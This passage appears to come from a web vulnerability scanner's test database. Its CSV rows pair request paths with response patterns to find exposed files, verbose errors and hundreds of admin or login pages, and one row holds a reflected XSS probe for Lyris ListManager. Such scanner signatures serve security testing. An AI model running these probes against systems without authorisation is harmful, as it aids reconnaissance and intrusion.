software.\",\"\",\"\"\n\"006190\",\"\",\"1b\",\"/READ_THIS_FIRST.txt\",\"GET\",\"BODY:Welcome to ExpressionEngine\",\"An ExpressionEngine readme file has been found.\",\"\",\"\"\n\"006191\",\"\",\"3\",\"@WORDPRESSwp-app.log\",\"GET\",\"!CODE:404&&BODY:Array&&BODY:LANG&&!BODY:GOOG_FIXURL_LANG\",\"WordPress' wp-app.log may leak application/system details.\",\"\",\"\"\n\"006192\",\"\",\"3\",\"/_vti_bin/_vti_adm/admin.dll\",\"GET\",\"BODY:osstatus=&&!BODY:specified module could not be found\",\"FrontPage/SharePoint file found.\",\"\",\"\"\n\"006193\",\"CVE-2005-4148\",\"3\",\"/read/rss?forum=nonexistent&rev=0.92\",\"GET\",\"BODY:no such element in array\",\"Lyris ListManager error information disclosure.\",\"\",\"\"\n\"006194\",\"https://www.procheckup.com/media/zjkb3pmc/new-listmanager-paper-v2.pdf\",\"3\",\"/subscribe/survey~1.tml\",\"GET\",\"BODY:Database error inf\",\"Lyris ListManager error information disclosure.\",\"\",\"\"\n\"006195\",\"https://www.procheckup.com/media/zjkb3pmc/new-listmanager-paper-v2.pdf\",\"4\",\"/scripts/message/message_dialog.tml?how_many_back=\\\"><script>alert(1)</script>\",\"GET\",\"BODY:<script>alert\\(1\\)<\\/script>\",\"Lyris ListManager Cross-Site Scripting.\",\"\",\"\"\n\"006196\",\"https://www.procheckup.com/media/zjkb3pmc/new-listmanager-paper-v2.pdf\",\"04\",\"/read/attach_file.tml?page=http://cirt.net/\",\"GET\",\"BODY:action=\\\"http:\\/\\/cirt\\.net\",\"Lyris ListManager XSRF.\",\"\",\"\"\n\"006197\",\"\",\"23\",\"/config/config.txt\",\"GET\",\"CODE:200\",\"Configuration file found.\",\"\",\"\"\n\"006198\",\"\",\"23\",\"/htaccess.txt\",\"GET\",\"BODY:RewriteEngine On\",\"Default Joomla! htaccess.txt file found. This should be removed or renamed.\",\"\",\"\"\n\"006199\",\"\",\"1b\",\"@TYPO3typo3/\",\"GET\",\"BODY:c\\-password&&BODY:TYPO3\\sScript\\sID&&CODE:200\",\"TYPO3 login found\",\"\",\"\"\n\"006200\",\"\",\"12\",\"@CGIDIRSphp.ini\",\"GET\",\"BODY:\\[PHP\\]\",\"php.ini file found\",\"\",\"\"\n\"006201\",\"\",\"3\",\"/ConversionReport.txt\",\"GET\",\"BODY:This report shows\",\"A report file from an ASP.NET 1.1 conversion to an ASP.NET 2.0 project was found and may reveal sensitive information.\",\"\",\"\"\n\"006202\",\"\",\"b\",\"/cadence/\",\"GET\",\"BODY:Cadre Technologies\",\"Cadre Technologies Cadence WebAccess was found.\",\"\",\"\"\n\"006204\",\"\",\"3\",\"/cadence/webaccess.net\",\"GET\",\"BODY:Failed connection\",\"Cadre Technologies Cadence WebAccess may reveal a database name due to it being offline or misconfigured.\",\"\",\"\"\n\"006205\",\"\",\"2\",\"/config/readme.txt\",\"GET\",\"CODE:200\",\"Readme file found.\",\"\",\"\"\n\"006206\",\"\",\"2\",\"/data/readme.txt\",\"GET\",\"CODE:200\",\"Readme file found.\",\"\",\"\"\n\"006207\",\"\",\"2\",\"/log/readme.txt\",\"GET\",\"CODE:200\",\"Readme file found.\",\"\",\"\"\n\"006208\",\"\",\"2\",\"/logs/readme.txt\",\"GET\",\"CODE:200\",\"Readme file found.\",\"\",\"\"\n\"006209\",\"\",\"2\",\"/uploads/readme.txt\",\"GET\",\"CODE:200\",\"Readme file found.\",\"\",\"\"\n\"006210\",\"\",\"b\",\"/cadence/help/help.htm\",\"GET\",\"BODY:Cadre Technologies\",\"Cadre Technologies Cadence WebAccess help files found.\",\"\",\"\"\n\"006211\",\"\",\"b\",\"/\",\"GET\",\"BODY:img src=\\\"welcome\\.png\\\" alt=\\\"IIS7\\\"\",\"Appears to be a default IIS 7 install.\",\"\",\"\"\n\"006212\",\"\",\"3\",\"/install/install.aspx\",\"GET\",\"BODY:dtsoftware\\&nbsp;Configuration\",\"dtsoftware 404 page reveals detailed application information.\",\"\",\"\"\n\"006213\",\"\",\"23\",\"/webresource.axd?d=@JUNK(5)\",\"GET\",\"BODY:NET Framework Version:&&BODY:Invalid viewstate\\.\",\"ASP.NET reveals its version in error messages when verbose debugging is enabled.\",\"\",\"\"\n\"006214\",\"\",\"23\",\"/scriptresource.axd?d=@JUNK(5)\",\"GET\",\"BODY:NET Framework Version:&&BODY:Invalid viewstate\\.\",\"ASP.NET reveals its version in error messages when verbose debugging is enabled.\",\"\",\"\"\n\"006215\",\"\",\"1\",\"/admin1.php\",\"GET\",\"CODE:200\",\"Admin login page found.\",\"\",\"\"\n\"006217\",\"\",\"1\",\"/admin.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006218\",\"\",\"1\",\"/admin/account.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006219\",\"\",\"1\",\"/admin/account.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006220\",\"\",\"1\",\"/admin/account.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006221\",\"\",\"1\",\"/admin/controlpanel.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006222\",\"\",\"1\",\"/admin/controlpanel.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006223\",\"\",\"1\",\"/admin/controlpanel.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006224\",\"\",\"1\",\"/admin/cp.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006225\",\"\",\"1\",\"/admin/cp.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006226\",\"\",\"1\",\"/admin/cp.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006227\",\"\",\"1\",\"/admin/home.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006228\",\"\",\"1\",\"/admin/home.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006229\",\"\",\"1\",\"/admin/index.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006230\",\"\",\"1\",\"/admin/index.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006231\",\"\",\"1\",\"/admin/login.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006232\",\"\",\"1\",\"/admin/login.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006233\",\"\",\"1\",\"/admin/login.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006234\",\"\",\"1\",\"/admin1.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006235\",\"\",\"1\",\"/admin1.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006236\",\"\",\"1\",\"/admin1/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006237\",\"\",\"1\",\"/admin2.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006238\",\"\",\"1\",\"/admin2.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006239\",\"\",\"1\",\"/admin2.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006240\",\"\",\"1\",\"/admin4_account/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006241\",\"\",\"1\",\"/admin4_colon/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006242\",\"\",\"1\",\"/admincontrol.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006243\",\"\",\"1\",\"/admincontrol.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006244\",\"\",\"1\",\"/admincontrol.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006245\",\"\",\"1\",\"/administer/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006246\",\"\",\"1\",\"/administr8.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006247\",\"\",\"1\",\"/administr8.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006248\",\"\",\"1\",\"/administr8.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006249\",\"\",\"1\",\"/administr8/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006250\",\"\",\"1\",\"/administracao.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006251\",\"\",\"1\",\"/administraçao.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006252\",\"\",\"1\",\"/administracao/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006253\",\"\",\"1\",\"/administraçao/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006254\",\"\",\"1\",\"/administracion.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006255\",\"\",\"1\",\"/administracion/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006256\",\"\",\"1\",\"/administrateur.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006257\",\"\",\"1\",\"/administrateur/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006258\",\"\",\"1\",\"/administratie/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006259\",\"\",\"1\",\"/administration.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006260\",\"\",\"1\",\"/administration.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006261\",\"\",\"1\",\"/administration/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006262\",\"\",\"1\",\"/administrator.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006263\",\"\",\"1\",\"/administrator.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006264\",\"\",\"1\",\"/administrator.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006265\",\"\",\"1\",\"/administrator/account.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006266\",\"\",\"1\",\"/administrator/account.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006267\",\"\",\"1\",\"/administrator/account.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006268\",\"\",\"1\",\"/administrator/index.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006269\",\"\",\"1\",\"/administrator/index.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006270\",\"\",\"1\",\"/administrator/index.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006271\",\"\",\"1\",\"/administrator/login.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006272\",\"\",\"1\",\"/administrator/login.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006273\",\"\",\"1\",\"/administrator/login.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006274\",\"\",\"1\",\"/administratoraccounts/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006275\",\"\",\"1\",\"/administrators/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006276\",\"\",\"1\",\"/administrivia/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006277\",\"\",\"1\",\"/adminisztrátora.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006278\",\"\",\"1\",\"/adminisztrátora/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006279\",\"\",\"1\",\"/adminpanel.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006280\",\"\",\"1\",\"/adminpanel.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006281\",\"\",\"1\",\"/adminpanel.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006282\",\"\",\"1\",\"/adminpro/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006283\",\"\",\"1\",\"/admins.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006284\",\"\",\"1\",\"/admins.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006285\",\"\",\"1\",\"/admins.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006286\",\"\",\"1\",\"/admins/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006287\",\"\",\"1\",\"/AdminTools/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006288\",\"\",\"1\",\"/amministratore.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006289\",\"\",\"1\",\"/amministratore/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006290\",\"\",\"1\",\"/autologin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006291\",\"\",\"1\",\"/banneradmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006292\",\"\",\"1\",\"/bbadmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006293\",\"\",\"1\",\"/beheerder.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006294\",\"\",\"1\",\"/beheerder/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006295\",\"\",\"1\",\"/bigadmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006296\",\"\",\"1\",\"/blogindex/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006297\",\"\",\"1\",\"/cadmins/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006298\",\"\",\"1\",\"/ccms/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006299\",\"\",\"1\",\"/ccms/index.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006300\",\"\",\"1\",\"/ccms/login.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006301\",\"\",\"1\",\"/ccp14admin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006302\",\"\",\"1\",\"/cmsadmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006303\",\"\",\"1\",\"/configuration/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006304\",\"\",\"1\",\"/configure/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006305\",\"\",\"1\",\"/controlpanel.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006306\",\"\",\"1\",\"/controlpanel.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006307\",\"\",\"1\",\"/controlpanel.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006308\",\"\",\"1\",\"/controlpanel/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006309\",\"\",\"1\",\"/cp.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006310\",\"\",\"1\",\"/cp.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006311\",\"\",\"1\",\"/cp.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006312\",\"\",\"1\",\"/cpanel_file/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006313\",\"\",\"1\",\"/customer_login/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006314\",\"\",\"1\",\"/database_administration/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006315\",\"\",\"1\",\"/Database_Administration/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006316\",\"\",\"1\",\"/dir-login/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006317\",\"\",\"1\",\"/directadmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006318\",\"\",\"1\",\"/ezsqliteadmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006319\",\"\",\"1\",\"/fileadmin.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006320\",\"\",\"1\",\"/fileadmin.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006321\",\"\",\"1\",\"/fileadmin.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006322\",\"\",\"1\",\"/formslogin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006323\",\"\",\"1\",\"/globes_admin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006324\",\"\",\"1\",\"/hpwebjetadmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006325\",\"\",\"1\",\"/Indy_admin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006326\",\"\",\"1\",\"/irc-macadmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006327\",\"\",\"1\",\"/LiveUser_Admin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006328\",\"\",\"1\",\"/login_db/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006329\",\"\",\"1\",\"/login-redirect/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006330\",\"\",\"1\",\"/login-us/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006331\",\"\",\"1\",\"/login.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006332\",\"\",\"1\",\"/login.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006333\",\"\",\"1\",\"/login.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006334\",\"\",\"1\",\"/login1/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006335\",\"\",\"1\",\"/loginflat/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006336\",\"\",\"1\",\"/logo_sysadmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006337\",\"\",\"1\",\"/Lotus_Domino_Admin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006338\",\"\",\"1\",\"/macadmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006339\",\"\",\"1\",\"/maintenance/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006340\",\"\",\"1\",\"/manuallogin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006341\",\"\",\"1\",\"/memlogin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006342\",\"\",\"1\",\"/meta_login/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006343\",\"\",\"1\",\"/modelsearch/login.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006344\",\"\",\"1\",\"/modelsearch/login.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006345\",\"\",\"1\",\"/moderator.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006346\",\"\",\"1\",\"/moderator.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006347\",\"\",\"1\",\"/moderator.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006348\",\"\",\"1\",\"/moderator/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006349\",\"\",\"1\",\"/moderator/admin.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006350\",\"\",\"1\",\"/moderator/admin.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006351\",\"\",\"1\",\"/moderator/admin.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006352\",\"\",\"1\",\"/moderator/login.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006353\",\"\",\"1\",\"/moderator/login.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006354\",\"\",\"1\",\"/moderator/login.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006355\",\"\",\"1\",\"/myadmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006356\",\"\",\"1\",\"/navSiteAdmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006357\",\"\",\"1\",\"/newsadmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006358\",\"\",\"1\",\"/openvpnadmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006359\",\"\",\"1\",\"/painel/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006360\",\"\",\"1\",\"/panel/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006361\",\"\",\"1\",\"/pgadmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006362\",\"\",\"1\",\"/phpldapadmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006363\",\"\",\"1\",\"/phppgadmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006364\",\"\",\"1\",\"/phpSQLiteAdmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006365\",\"\",\"1\",\"/platz_login/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006366\",\"\",\"1\",\"/power_user/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006367\",\"\",\"1\",\"/project-admins/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006368\",\"\",\"1\",\"/pureadmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006369\",\"\",\"1\",\"/radmind-1/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006370\",\"\",\"1\",\"/radmind/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006371\",\"\",\"1\",\"/rcLogin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006372\",\"\",\"1\",\"/server_admin_small/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006373\",\"\",\"1\",\"/Server.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006374\",\"\",\"1\",\"/Server.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006375\",\"\",\"1\",\"/Server.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006376\",\"\",\"1\",\"/ServerAdministrator/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006377\",\"\",\"1\",\"/showlogin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006378\",\"\",\"1\",\"/simpleLogin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006379\",\"\",\"1\",\"/smblogin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006380\",\"\",\"1\",\"/sql-admin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006381\",\"\",\"1\",\"/ss_vms_admin_sm/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006382\",\"\",\"1\",\"/sshadmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006383\",\"\",\"1\",\"/staradmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006384\",\"\",\"1\",\"/sub-login/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006385\",\"\",\"1\",\"/Super-Admin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006386\",\"\",\"1\",\"/support_login/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006387\",\"\",\"1\",\"/sys-admin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006388\",\"\",\"1\",\"/sysadmin.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006389\",\"\",\"1\",\"/sysadmin.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006390\",\"\",\"1\",\"/sysadmin.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006391\",\"\",\"1\",\"/sysadmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006392\",\"\",\"1\",\"/SysAdmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006393\",\"\",\"1\",\"/SysAdmin2/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006394\",\"\",\"1\",\"/sysadmins/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006395\",\"\",\"1\",\"/system_administration/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006396\",\"\",\"1\",\"/system-administration/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006398\",\"\",\"1\",\"/ur-admin.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006399\",\"\",\"1\",\"/ur-admin.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006400\",\"\",\"1\",\"/ur-admin.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006401\",\"\",\"1\",\"/ur-admin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006402\",\"\",\"1\",\"/useradmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006403\",\"\",\"1\",\"/UserLogin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006404\",\"\",\"1\",\"/utility_login/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006405\",\"\",\"1\",\"/v2/painel/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006406\",\"\",\"1\",\"/vadmind/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006407\",\"\",\"1\",\"/vmailadmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006408\",\"\",\"1\",\"/webadmin.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006409\",\"\",\"1\",\"/webadmin.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006410\",\"\",\"1\",\"/webadmin.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006411\",\"\",\"1\",\"/webmaster/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006412\",\"\",\"1\",\"/websvn/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006413\",\"\",\"1\",\"/wizmysqladmin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006414\",\"\",\"1\",\"@WORDPRESSwp-admin/\",\"GET\",\"CODE:200\",\"Admin login page/section 